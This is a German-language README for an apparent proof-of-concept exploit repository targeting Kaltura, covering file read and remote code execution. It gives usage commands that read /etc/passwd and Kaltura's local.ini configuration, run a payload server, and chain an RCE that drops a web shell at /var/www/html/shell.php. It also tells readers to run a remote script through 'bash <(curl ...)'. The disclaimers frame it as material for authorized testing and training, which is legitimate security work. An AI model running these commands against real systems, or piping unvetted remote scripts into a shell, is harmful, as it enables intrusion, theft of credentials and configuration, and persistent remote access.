
Proof-of-Concept-Exploits für CVE-2026-19912, CVE-2026-19913 und CVE-2026-19914, die Dateilesen und Remote-Code-Ausführung in Kaltura demonstrieren, vorgesehen für autorisierte Sicherheitstests und Schulungszwecke.
Führen Sie die neueste Version des externen Download-Skripts direkt von GitHub aus:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Dieser Befehl erfordert Bash und
curl. Überprüfen Sie das Remote-Skript, bevor Sie es ausführen, wenn Sie der Quelle nicht vertrauen.
Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone <repository-url>
cd <repository-name>
# Projekt verwendet Python, siehe unten
# Virtuelle Umgebung erstellen
python -m venv venv
# Virtuelle Umgebung aktivieren
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Anforderungen installieren
pip install -r requirements.txt
Beispielverwendung:
# 1. Datei lesen (am zuverlässigsten, funktioniert wie im Artikel beschrieben)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Nur der Payload-Server (manuell mit Burp / curl verwenden)
python3 kaltura_poc.py serve --lport 8888
# 3. Vollständiges Chain-Skelett
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich bildungsbezogener und autorisierter Sicherheitsforschung.
Es wurde entwickelt, um Benutzern das Lernen über Folgendes zu ermöglichen:
Verwenden Sie dieses Repository nur in Umgebungen, in denen Sie die Berechtigung haben, wie zum Beispiel:
Unbefugte oder illegale Nutzung ist strengstens untersagt.
Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmen Sie zu, dass:
Dieses Projekt ist vorgesehen für:
Bitte befolgen Sie verantwortungsvolle Offenlegungspraktiken und halten Sie sich an alle geltenden Gesetze.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Betreuer über GitHub.
Entdecken Sie die PoC-CVE-Sammlung für zusätzliche CVE-Proof-of-Concept-Ressourcen, die für autorisierte Sicherheitsforschung und Bildung bestimmt sind.